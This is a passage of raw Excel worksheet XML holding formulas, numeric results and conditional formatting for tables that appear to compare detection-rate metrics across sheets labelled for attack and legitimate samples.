        <f>'Tabla 3 (Legítimo)'!H5</f>
        <v>6420</v>
      </c>
      <c r="I13" s="285">
        <f>'Tabla 3 (Legítimo)'!I5</f>
        <v>7505544</v>
      </c>
      <c r="J13" s="306">
        <f>'Tabla 3 (Legítimo)'!J5</f>
        <v>21256304</v>
      </c>
      <c r="K13" s="461">
        <f>'Tabla 3 (Legítimo)'!K5</f>
        <v>4421445</v>
      </c>
      <c r="L13" s="608">
        <f>'Tabla 3 (Legítimo)'!L5</f>
        <v>25704108</v>
      </c>
      <c r="M13" s="461">
        <f>'Tabla 3 (Legítimo)'!M5</f>
        <v>56932</v>
      </c>
      <c r="N13" s="608">
        <f>'Tabla 3 (Legítimo)'!N5</f>
        <v>56932</v>
      </c>
      <c r="S13" s="214"/>
    </row>
    <row r="14" spans="1:19" ht="15" customHeight="1" thickTop="1">
      <c r="A14" s="480" t="s">
        <v>638</v>
      </c>
      <c r="B14" s="534">
        <f>B6/'T2 (At) S&lt;=4, FG&gt;=1'!$D$79</f>
        <v>0.72727272727272729</v>
      </c>
      <c r="C14" s="535">
        <f>C6/'T2 (At) S&lt;=4, FG&gt;=1'!$D$79</f>
        <v>0.46363636363636362</v>
      </c>
      <c r="D14" s="535">
        <f>D6/'T2 (At) S&lt;=4, FG&gt;=1'!$D$79</f>
        <v>0.8</v>
      </c>
      <c r="E14" s="588">
        <f>E6/'T2 (At) S&lt;=4, FG&gt;=1'!$D$79</f>
        <v>0.94545454545454544</v>
      </c>
      <c r="F14" s="588">
        <f>F6/'T2 (At) S&lt;=4, FG&gt;=1'!$D$79</f>
        <v>1</v>
      </c>
      <c r="G14" s="588">
        <f>G6/'T2 (At) S&lt;=4, FG&gt;=1'!$D$79</f>
        <v>1</v>
      </c>
      <c r="H14" s="535">
        <f>H6/'T2 (At) S&lt;=4, FG&gt;=1'!$D$79</f>
        <v>9.0909090909090905E-3</v>
      </c>
      <c r="I14" s="535">
        <f>I6/'T2 (At) S&lt;=4, FG&gt;=1'!$D$79</f>
        <v>0.50909090909090904</v>
      </c>
      <c r="J14" s="538">
        <f>J6/'T2 (At) S&lt;=4, FG&gt;=1'!$D$79</f>
        <v>0.88181818181818183</v>
      </c>
      <c r="K14" s="539">
        <f>K6/'T2 (At) S&lt;=4, FG&gt;=1'!$D$79</f>
        <v>0.6</v>
      </c>
      <c r="L14" s="540">
        <f>L6/'T2 (At) S&lt;=4, FG&gt;=1'!$D$79</f>
        <v>0.95454545454545459</v>
      </c>
      <c r="M14" s="539">
        <f>M6/'T2 (At) S&lt;=4, FG&gt;=1'!$D$79</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="N14" s="540">
        <f>N6/'T2 (At) S&lt;=4, FG&gt;=1'!$D$79</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="O14" s="262" t="s">
        <v>4459</v>
      </c>
      <c r="S14" s="214"/>
    </row>
    <row r="15" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A15" s="564" t="s">
        <v>639</v>
      </c>
      <c r="B15" s="593">
        <f t="shared" ref="B15:N15" si="0">B10/$B$4</f>
        <v>4.3095447204842499E-2</v>
      </c>
      <c r="C15" s="589">
        <f t="shared" si="0"/>
        <v>5.9978253036824594E-2</v>
      </c>
      <c r="D15" s="589">
        <f t="shared" si="0"/>
        <v>9.2463452773130464E-2</v>
      </c>
      <c r="E15" s="591">
        <f t="shared" si="0"/>
        <v>8.7417642920242442E-2</v>
      </c>
      <c r="F15" s="591">
        <f t="shared" si="0"/>
        <v>7.7711617040776795E-2</v>
      </c>
      <c r="G15" s="591">
        <f t="shared" si="0"/>
        <v>0.12044724105863651</v>
      </c>
      <c r="H15" s="589">
        <f t="shared" si="0"/>
        <v>8.1302046557277675E-5</v>
      </c>
      <c r="I15" s="589">
        <f t="shared" si="0"/>
        <v>9.4935921966097472E-2</v>
      </c>
      <c r="J15" s="590">
        <f t="shared" si="0"/>
        <v>0.13794002826586751</v>
      </c>
      <c r="K15" s="541">
        <f t="shared" si="0"/>
        <v>5.6071929869906813E-2</v>
      </c>
      <c r="L15" s="540">
        <f t="shared" si="0"/>
        <v>0.23649353549612026</v>
      </c>
      <c r="M15" s="541">
        <f t="shared" si="0"/>
        <v>3.5801873393321996E-4</v>
      </c>
      <c r="N15" s="540">
        <f t="shared" si="0"/>
        <v>3.5801873393321996E-4</v>
      </c>
      <c r="O15" s="262" t="s">
        <v>4460</v>
      </c>
      <c r="S15" s="214"/>
    </row>
    <row r="16" spans="1:19" ht="15" customHeight="1" thickTop="1" thickBot="1">
      <c r="A16" s="447" t="s">
        <v>640</v>
      </c>
      <c r="B16" s="536">
        <f t="shared" ref="B16:N16" si="1">SQRT(B14*(1-B15))</f>
        <v>0.83422454042723038</v>
      </c>
      <c r="C16" s="537">
        <f t="shared" si="1"/>
        <v>0.66017290500376391</v>
      </c>
      <c r="D16" s="537">
        <f t="shared" si="1"/>
        <v>0.85207349318089676</v>
      </c>
      <c r="E16" s="537">
        <f t="shared" si="1"/>
        <v>0.928873047085919</v>
      </c>
      <c r="F16" s="537">
        <f t="shared" si="1"/>
        <v>0.9603584658653368</v>
      </c>
      <c r="G16" s="537">
        <f t="shared" si="1"/>
        <v>0.93784474138386231</v>
      </c>
      <c r="H16" s="537">
        <f t="shared" si="1"/>
        <v>9.5342382922784838E-2</v>
      </c>
      <c r="I16" s="537">
        <f t="shared" si="1"/>
        <v>0.67879296863756988</v>
      </c>
      <c r="J16" s="543">
        <f t="shared" si="1"/>
        <v>0.87188310964992655</v>
      </c>
      <c r="K16" s="544">
        <f t="shared" si="1"/>
        <v>0.7525668356219638</v>
      </c>
      <c r="L16" s="545">
        <f t="shared" si="1"/>
        <v>0.85369879067985621</v>
      </c>
      <c r="M16" s="544">
        <f t="shared" si="1"/>
        <v>0.83106060700234174</v>
      </c>
      <c r="N16" s="545">
        <f t="shared" si="1"/>
        <v>0.83106060700234174</v>
      </c>
      <c r="S16" s="214"/>
    </row>
    <row r="17" spans="1:17" ht="15" customHeight="1" thickTop="1">
      <c r="A17" s="525" t="s">
        <v>4915</v>
      </c>
      <c r="B17" s="594">
        <f t="shared" ref="B17:N17" si="2">B12/B8</f>
        <v>262.43508950857512</v>
      </c>
      <c r="C17" s="595">
        <f t="shared" si="2"/>
        <v>417.33128461947035</v>
      </c>
      <c r="D17" s="595">
        <f t="shared" si="2"/>
        <v>302.90808517387683</v>
      </c>
      <c r="E17" s="595">
        <f t="shared" si="2"/>
        <v>8.5082939712191106</v>
      </c>
      <c r="F17" s="595">
        <f t="shared" si="2"/>
        <v>39.528964604103741</v>
      </c>
      <c r="G17" s="595">
        <f t="shared" si="2"/>
        <v>13.835353748386364</v>
      </c>
      <c r="H17" s="595">
        <f t="shared" si="2"/>
        <v>436.875</v>
      </c>
      <c r="I17" s="595">
        <f t="shared" si="2"/>
        <v>339.95576563958917</v>
      </c>
      <c r="J17" s="596">
        <f t="shared" si="2"/>
        <v>315.38927567453959</v>
      </c>
      <c r="K17" s="526">
        <f t="shared" si="2"/>
        <v>6.7666880772485678</v>
      </c>
      <c r="L17" s="527">
        <f t="shared" si="2"/>
        <v>13.060886830246627</v>
      </c>
      <c r="M17" s="526">
        <f t="shared" si="2"/>
        <v>7.8317754762474798E-3</v>
      </c>
      <c r="N17" s="527">
        <f t="shared" si="2"/>
        <v>3.9158877381237399E-3</v>
      </c>
    </row>
    <row r="18" spans="1:17" ht="15" customHeight="1" thickBot="1">
      <c r="A18" s="566" t="s">
        <v>4916</v>
      </c>
      <c r="B18" s="528">
        <f t="shared" ref="B18:N18" si="3">B13/B9</f>
        <v>637.45381941876803</v>
      </c>
      <c r="C18" s="597">
        <f t="shared" si="3"/>
        <v>1033.9933574879226</v>
      </c>
      <c r="D18" s="597">
        <f t="shared" si="3"/>
        <v>743.99259099021151</v>
      </c>
      <c r="E18" s="597">
        <f t="shared" si="3"/>
        <v>34.263134956260309</v>
      </c>
      <c r="F18" s="597">
        <f t="shared" si="3"/>
        <v>67.752242582625556</v>
      </c>
      <c r="G18" s="597">
        <f t="shared" si="3"/>
        <v>45.723444735551368</v>
      </c>
      <c r="H18" s="597">
        <f t="shared" si="3"/>
        <v>3210</v>
      </c>
      <c r="I18" s="597">
        <f t="shared" si="3"/>
        <v>914.52954794687457</v>
      </c>
      <c r="J18" s="529">
        <f t="shared" si="3"/>
        <v>796.23554090500454</v>
      </c>
      <c r="K18" s="528">
        <f t="shared" si="3"/>
        <v>6.7415799721581404</v>
      </c>
      <c r="L18" s="529">
        <f t="shared" si="3"/>
        <v>12.99926416705987</v>
      </c>
      <c r="M18" s="528">
        <f t="shared" si="3"/>
        <v>2.2252257393251155E-2</v>
      </c>
      <c r="N18" s="529">
        <f t="shared" si="3"/>
        <v>1.1281142428683413E-2</v>
      </c>
    </row>
    <row r="19" spans="1:17" ht="26.45" customHeight="1" thickTop="1">
      <c r="A19" s="24"/>
      <c r="B19" s="573"/>
      <c r="C19" s="24"/>
      <c r="D19" s="24"/>
      <c r="E19" s="23" t="s">
        <v>669</v>
      </c>
      <c r="F19" s="24"/>
      <c r="G19" s="24"/>
      <c r="H19" s="24"/>
      <c r="I19" s="24"/>
      <c r="J19" s="574"/>
      <c r="K19" s="722"/>
      <c r="L19" s="722"/>
      <c r="M19" s="722"/>
      <c r="N19" s="722"/>
      <c r="O19" s="722"/>
      <c r="P19" s="722"/>
      <c r="Q19" s="722"/>
    </row>
    <row r="20" spans="1:17">
      <c r="A20" s="24"/>
      <c r="B20" s="24"/>
      <c r="C20" s="24"/>
      <c r="D20" s="24"/>
      <c r="E20" s="24"/>
      <c r="F20" s="24"/>
      <c r="G20" s="24"/>
      <c r="H20" s="24"/>
      <c r="I20" s="24"/>
      <c r="J20" s="575" t="s">
        <v>657</v>
      </c>
    </row>
    <row r="21" spans="1:17" ht="23.25" customHeight="1">
      <c r="A21" s="716" t="s">
        <v>670</v>
      </c>
      <c r="B21" s="716"/>
      <c r="C21" s="716"/>
      <c r="D21" s="716"/>
      <c r="E21" s="23" t="s">
        <v>648</v>
      </c>
      <c r="F21" s="24"/>
      <c r="G21" s="24"/>
      <c r="H21" s="23" t="s">
        <v>649</v>
      </c>
      <c r="I21" s="24"/>
      <c r="J21" s="25" t="s">
        <v>654</v>
      </c>
      <c r="K21" s="23" t="s">
        <v>642</v>
      </c>
      <c r="L21" s="23"/>
      <c r="M21" s="23"/>
    </row>
    <row r="22" spans="1:17" ht="25.5" customHeight="1">
      <c r="A22" s="23" t="s">
        <v>671</v>
      </c>
      <c r="B22" s="24"/>
      <c r="C22" s="24"/>
      <c r="D22" s="24"/>
      <c r="E22" s="23" t="s">
        <v>659</v>
      </c>
      <c r="F22" s="24"/>
      <c r="G22" s="24"/>
      <c r="H22" s="23" t="s">
        <v>660</v>
      </c>
      <c r="I22" s="24"/>
      <c r="J22" s="25" t="s">
        <v>655</v>
      </c>
      <c r="K22" s="23" t="s">
        <v>647</v>
      </c>
      <c r="L22" s="23"/>
      <c r="M22" s="23"/>
    </row>
    <row r="23" spans="1:17">
      <c r="A23" s="715" t="s">
        <v>672</v>
      </c>
      <c r="B23" s="715"/>
      <c r="C23" s="715"/>
      <c r="D23" s="715"/>
      <c r="E23" s="23" t="s">
        <v>650</v>
      </c>
      <c r="F23" s="24"/>
      <c r="G23" s="24"/>
      <c r="H23" s="23" t="s">
        <v>651</v>
      </c>
      <c r="I23" s="24"/>
      <c r="J23" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K23" s="23" t="s">
        <v>643</v>
      </c>
      <c r="L23" s="23"/>
      <c r="M23" s="23"/>
    </row>
    <row r="24" spans="1:17">
      <c r="A24" s="24"/>
      <c r="B24" s="24"/>
      <c r="C24" s="24"/>
      <c r="D24" s="24"/>
      <c r="E24" s="24"/>
      <c r="F24" s="24"/>
      <c r="G24" s="24"/>
      <c r="H24" s="24"/>
      <c r="I24" s="24"/>
      <c r="J24" s="25"/>
      <c r="K24" s="24"/>
      <c r="L24" s="24"/>
      <c r="M24" s="24"/>
    </row>
    <row r="25" spans="1:17">
      <c r="A25" s="23" t="s">
        <v>661</v>
      </c>
      <c r="B25" s="24"/>
      <c r="C25" s="24"/>
      <c r="D25" s="24"/>
      <c r="E25" s="24"/>
      <c r="F25" s="24"/>
      <c r="G25" s="24"/>
      <c r="H25" s="24"/>
      <c r="I25" s="24"/>
      <c r="J25" s="25"/>
      <c r="K25" s="24"/>
      <c r="L25" s="24"/>
      <c r="M25" s="24"/>
    </row>
    <row r="26" spans="1:17">
      <c r="A26" s="23" t="s">
        <v>662</v>
      </c>
      <c r="B26" s="24"/>
      <c r="C26" s="24"/>
      <c r="D26" s="24"/>
      <c r="E26" s="23" t="s">
        <v>652</v>
      </c>
      <c r="F26" s="24"/>
      <c r="G26" s="24"/>
      <c r="H26" s="23" t="s">
        <v>653</v>
      </c>
      <c r="I26" s="24"/>
      <c r="J26" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K26" s="23" t="s">
        <v>644</v>
      </c>
      <c r="L26" s="23"/>
      <c r="M26" s="23"/>
    </row>
    <row r="27" spans="1:17">
      <c r="A27" s="24" t="s">
        <v>645</v>
      </c>
      <c r="B27" s="24"/>
      <c r="C27" s="24"/>
      <c r="D27" s="24"/>
      <c r="E27" s="23" t="s">
        <v>640</v>
      </c>
      <c r="F27" s="24"/>
      <c r="G27" s="24"/>
      <c r="H27" s="23" t="s">
        <v>666</v>
      </c>
      <c r="I27" s="24"/>
      <c r="J27" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K27" s="23" t="s">
        <v>646</v>
      </c>
      <c r="L27" s="23"/>
      <c r="M27" s="23"/>
    </row>
    <row r="29" spans="1:17">
      <c r="H29" s="23"/>
    </row>
    <row r="30" spans="1:17">
      <c r="A30" s="23" t="s">
        <v>663</v>
      </c>
      <c r="E30" s="262" t="s">
        <v>664</v>
      </c>
      <c r="H30" s="23" t="s">
        <v>665</v>
      </c>
      <c r="J30" s="25" t="s">
        <v>655</v>
      </c>
      <c r="K30" s="262" t="s">
        <v>2321</v>
      </c>
      <c r="L30" s="262"/>
      <c r="M30" s="262"/>
    </row>
    <row r="32" spans="1:17">
      <c r="A32" s="262" t="s">
        <v>4917</v>
      </c>
      <c r="E32" s="262" t="s">
        <v>4918</v>
      </c>
      <c r="H32" s="23" t="s">
        <v>2248</v>
      </c>
      <c r="J32" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K32" s="572" t="s">
        <v>2247</v>
      </c>
      <c r="L32" s="572"/>
      <c r="M32" s="572"/>
    </row>
    <row r="33" spans="1:3" ht="29.25" customHeight="1"/>
    <row r="34" spans="1:3">
      <c r="A34" s="576" t="s">
        <v>673</v>
      </c>
      <c r="B34" s="577">
        <v>1</v>
      </c>
      <c r="C34" s="262" t="s">
        <v>2322</v>
      </c>
    </row>
    <row r="36" spans="1:3">
      <c r="A36" s="578"/>
    </row>
  </sheetData>
  <mergeCells count="12">
    <mergeCell ref="B1:J1"/>
    <mergeCell ref="K1:L1"/>
    <mergeCell ref="M1:N1"/>
    <mergeCell ref="A23:D23"/>
    <mergeCell ref="A21:D21"/>
    <mergeCell ref="B3:N3"/>
    <mergeCell ref="B4:N4"/>
    <mergeCell ref="B5:N5"/>
    <mergeCell ref="K19:Q19"/>
    <mergeCell ref="O6:P7"/>
    <mergeCell ref="O10:P11"/>
    <mergeCell ref="O5:P5"/>
  </mergeCells>
  <conditionalFormatting sqref="E6:G6">
    <cfRule type="expression" dxfId="578" priority="46">
      <formula>IF(E6&lt;B6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E7:G7">
    <cfRule type="expression" dxfId="577" priority="41">
      <formula>IF(E7&gt;B7,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E8:G10">
    <cfRule type="expression" dxfId="576" priority="27">
      <formula>IF(E8&lt;B8,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E11:G11">
    <cfRule type="expression" dxfId="575" priority="38">
      <formula>IF(E11&gt;B11,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E12:G15">
    <cfRule type="expression" dxfId="574" priority="22">
      <formula>IF(E12&lt;B12,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L6">
    <cfRule type="expression" dxfId="573" priority="21">
      <formula>IF(L6&lt;K6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L7">
    <cfRule type="expression" dxfId="572" priority="19">
      <formula>IF(L7&gt;K7,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L8:L10">
    <cfRule type="expression" dxfId="571" priority="16">
      <formula>IF(L8&lt;K8,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L11">
    <cfRule type="expression" dxfId="570" priority="15">
      <formula>IF(L11&gt;K11,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L12:L15">
    <cfRule type="expression" dxfId="569" priority="11">
      <formula>IF(L12&lt;K12,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N6">
    <cfRule type="expression" dxfId="568" priority="10">
      <formula>IF(N6&lt;M6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N7">
    <cfRule type="expression" dxfId="567" priority="9">
      <formula>IF(N7&gt;M7,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N8:N10">
    <cfRule type="expression" dxfId="566" priority="6">
      <formula>IF(N8&lt;M8,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N11">
    <cfRule type="expression" dxfId="565" priority="5">
      <formula>IF(N11&gt;M11,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N12:N15">
    <cfRule type="expression" dxfId="564" priority="1">
      <formula>IF(N12&lt;M12,1,0)</formula>
    </cfRule>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FFD1DB"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:S56"/>
  <sheetViews>
    <sheetView zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <pane xSplit="1" ySplit="4" topLeftCell="F5" activePane="bottomRight" state="frozen"/>
      <selection pane="topRight" activeCell="B1" sqref="B1"/>
      <selection pane="bottomLeft" activeCell="A5" sqref="A5"/>
      <selection pane="bottomRight" activeCell="K55" sqref="K55:N55"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.42578125" defaultRowHeight="12.75"/>
  <cols>
    <col min="1" max="1" width="34.140625" style="26" customWidth="1"/>
    <col min="2" max="2" width="20.140625" style="214" customWidth="1"/>
    <col min="3" max="3" width="21.140625" style="214" customWidth="1"/>
    <col min="4" max="4" width="20.42578125" style="214" customWidth="1"/>
    <col min="5" max="5" width="19.42578125" style="214" customWidth="1"/>
    <col min="6" max="6" width="15.5703125" style="214" customWidth="1"/>
    <col min="7" max="7" width="11" style="214" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="11.42578125" style="214" customWidth="1"/>
    <col min="9" max="9" width="16.7109375" style="214" customWidth="1"/>
    <col min="10" max="10" width="11.85546875" style="214" customWidth="1"/>
    <col min="11" max="11" width="15.85546875" style="214" customWidth="1"/>
    <col min="12" max="12" width="21.42578125" style="214" customWidth="1"/>
    <col min="13" max="13" width="15.140625" style="214" customWidth="1"/>
    <col min="14" max="14" width="29.28515625" style="214" customWidth="1"/>
    <col min="15" max="16384" width="11.42578125" style="26"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:19" ht="19.5">
      <c r="A1" s="569" t="s">
        <v>2352</v>
      </c>
      <c r="B1" s="570"/>
      <c r="C1" s="570"/>
      <c r="D1" s="570"/>
    </row>
    <row r="2" spans="1:19" ht="12.75" customHeight="1">
      <c r="A2" s="571"/>
      <c r="B2" s="713" t="s">
        <v>2340</v>
      </c>
      <c r="C2" s="714"/>
      <c r="D2" s="714"/>
      <c r="E2" s="714"/>
      <c r="F2" s="714"/>
      <c r="G2" s="714"/>
      <c r="H2" s="714"/>
      <c r="I2" s="714"/>
      <c r="J2" s="714"/>
      <c r="K2" s="701" t="s">
        <v>680</v>
      </c>
      <c r="L2" s="702"/>
      <c r="M2" s="703" t="s">
        <v>681</v>
      </c>
      <c r="N2" s="704"/>
    </row>
    <row r="3" spans="1:19" ht="28.5" customHeight="1" thickBot="1">
      <c r="A3" s="21" t="s">
        <v>641</v>
      </c>
      <c r="B3" s="21" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="21" t="s">
        <v>1</v>
      </c>
      <c r="D3" s="21" t="s">
        <v>2</v>
      </c>
      <c r="E3" s="21" t="s">
        <v>3</v>
      </c>
      <c r="F3" s="21" t="s">
        <v>1758</v>
      </c>
      <c r="G3" s="21" t="s">
        <v>1759</v>
      </c>
      <c r="H3" s="21" t="s">
        <v>1760</v>
      </c>
      <c r="I3" s="21" t="s">
        <v>1761</v>
      </c>
      <c r="J3" s="310" t="s">
        <v>1762</v>
      </c>
      <c r="K3" s="416" t="s">
        <v>2341</v>
      </c>
      <c r="L3" s="417" t="s">
        <v>2434</v>
      </c>
      <c r="M3" s="419" t="s">
        <v>2341</v>
      </c>
      <c r="N3" s="420" t="s">
        <v>2435</v>
      </c>
      <c r="S3" s="214"/>
    </row>
    <row r="4" spans="1:19" ht="12.75" customHeight="1" thickTop="1" thickBot="1">
      <c r="A4" s="727" t="s">
        <v>4584</v>
      </c>
      <c r="B4" s="728"/>
      <c r="C4" s="728"/>
      <c r="D4" s="728"/>
      <c r="E4" s="728"/>
      <c r="F4" s="728"/>
      <c r="G4" s="728"/>
      <c r="H4" s="728"/>
      <c r="I4" s="728"/>
      <c r="J4" s="728"/>
      <c r="K4" s="728"/>
      <c r="L4" s="728"/>
      <c r="M4" s="728"/>
      <c r="N4" s="729"/>
      <c r="S4" s="214"/>
    </row>
    <row r="5" spans="1:19">
      <c r="A5" s="259" t="s">
        <v>640</v>
      </c>
      <c r="B5" s="557">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!B16</f>
        <v>0.83422454042723038</v>
      </c>
      <c r="C5" s="557">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!C16</f>
        <v>0.66017290500376391</v>
      </c>
      <c r="D5" s="557">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!D16</f>
        <v>0.85207349318089676</v>
      </c>
      <c r="E5" s="557">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!E16</f>
        <v>0.928873047085919</v>
      </c>
      <c r="F5" s="557">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!F16</f>
        <v>0.9603584658653368</v>
      </c>
      <c r="G5" s="557">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!G16</f>
        <v>0.93784474138386231</v>
      </c>
      <c r="H5" s="557">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!H16</f>
        <v>9.5342382922784838E-2</v>
      </c>
      <c r="I5" s="557">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!I16</f>
        <v>0.67879296863756988</v>
      </c>
      <c r="J5" s="558">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!J16</f>
        <v>0.87188310964992655</v>
      </c>
      <c r="K5" s="559">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!K16</f>
        <v>0.7525668356219638</v>
      </c>
      <c r="L5" s="560">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!L16</f>
        <v>0.85369879067985621</v>
      </c>
      <c r="M5" s="561">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!M16</f>
        <v>0.83106060700234174</v>
      </c>
      <c r="N5" s="560">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!N16</f>
        <v>0.83106060700234174</v>
      </c>
      <c r="S5" s="214"/>
    </row>
    <row r="6" spans="1:19">
      <c r="A6" s="366" t="s">
        <v>4147</v>
      </c>
      <c r="B6" s="364">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$K$79</f>
        <v>0.72727272727272729</v>
      </c>
      <c r="C6" s="364">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$Q$79</f>
        <v>0.46363636363636362</v>
      </c>
      <c r="D6" s="364">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$W$79</f>
        <v>0.8</v>
      </c>
      <c r="E6" s="364">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$AC$79</f>
        <v>0.94545454545454544</v>
      </c>
      <c r="F6" s="364">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$AI$79</f>
        <v>1</v>
      </c>
      <c r="G6" s="364">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$AO$79</f>
        <v>1</v>
      </c>
      <c r="H6" s="364">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$AU$79</f>
        <v>9.0909090909090905E-3</v>
      </c>
      <c r="I6" s="364">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$BA$79</f>
        <v>0.50909090909090904</v>
      </c>
      <c r="J6" s="365">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$BG$79</f>
        <v>0.88181818181818183</v>
      </c>
      <c r="K6" s="455">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$BM$79</f>
        <v>0.6</v>
      </c>
      <c r="L6" s="456">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$BT$79</f>
        <v>0.95454545454545459</v>
      </c>
      <c r="M6" s="450">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$BZ$79</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="N6" s="456">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$CG$79</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="O6" s="572"/>
      <c r="P6" s="572"/>
      <c r="Q6" s="572"/>
      <c r="S6" s="214"/>
    </row>
    <row r="7" spans="1:19">
      <c r="A7" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B7" s="281">
        <f t="shared" ref="B7:N7" si="0">SUM(B8,B9)</f>
        <v>8633811</v>
      </c>
      <c r="C7" s="281">
        <f t="shared" si="0"/>
        <v>5141847</v>
      </c>
      <c r="D7" s="281">
        <f t="shared" si="0"/>
        <v>13775658</v>
      </c>
      <c r="E7" s="281">
        <f t="shared" si="0"/>
        <v>13511987</v>
      </c>
      <c r="F7" s="281">
        <f t="shared" si="0"/>
        <v>13259420</v>
      </c>
      <c r="G7" s="281">
        <f t="shared" si="0"/>
        <v>26768282</v>
      </c>
      <c r="H7" s="281">
        <f t="shared" si="0"/>
        <v>6422</v>
      </c>
      <c r="I7" s="281">
        <f t="shared" si="0"/>
        <v>7513751</v>
      </c>
      <c r="J7" s="311">
        <f t="shared" si="0"/>
        <v>21283000</v>
      </c>
      <c r="K7" s="451">
        <f t="shared" si="0"/>
        <v>5077292</v>
      </c>
      <c r="L7" s="454">
        <f>SUM(L8,L9)</f>
        <v>27681459</v>
      </c>
      <c r="M7" s="451">
        <f t="shared" si="0"/>
        <v>2615414</v>
      </c>
      <c r="N7" s="454">
        <f t="shared" si="0"/>
        <v>5103584</v>
      </c>
      <c r="O7" s="572"/>
      <c r="P7" s="572"/>
      <c r="Q7" s="572"/>
      <c r="S7" s="214"/>
    </row>
    <row r="8" spans="1:19" ht="16.5" customHeight="1">
      <c r="A8" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B8" s="281">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!B9</f>
        <v>13523</v>
      </c>
      <c r="C8" s="281">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!C9</f>
        <v>4968</v>
      </c>
      <c r="D8" s="281">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!D9</f>
        <v>18491</v>
      </c>
      <c r="E8" s="281">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!E9</f>
        <v>383176</v>
      </c>
      <c r="F8" s="281">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!F9</f>
        <v>192858</v>
      </c>
      <c r="G8" s="281">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!G9</f>
        <v>572909</v>
      </c>
      <c r="H8" s="281">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!H9</f>
        <v>2</v>
      </c>
      <c r="I8" s="281">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!I9</f>
        <v>8207</v>
      </c>
      <c r="J8" s="311">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!J9</f>
        <v>26696</v>
      </c>
      <c r="K8" s="451">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!K9</f>
        <v>655847</v>
      </c>
      <c r="L8" s="454">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!L9</f>
        <v>1977351</v>
      </c>
      <c r="M8" s="449">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!M9</f>
        <v>2558482</v>
      </c>
      <c r="N8" s="454">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!N9</f>
        <v>5046652</v>
      </c>
      <c r="O8" s="572"/>
      <c r="P8" s="572"/>
      <c r="Q8" s="572"/>
      <c r="S8" s="214"/>
    </row>
    <row r="9" spans="1:19" ht="12.2" customHeight="1">
      <c r="A9" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B9" s="281">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!B13</f>
        <v>8620288</v>
      </c>
      <c r="C9" s="281">
        <f>'T4 (Rend) S&lt;=4, FG&gt;=1'!C13</f>
        <v>5136879</v>
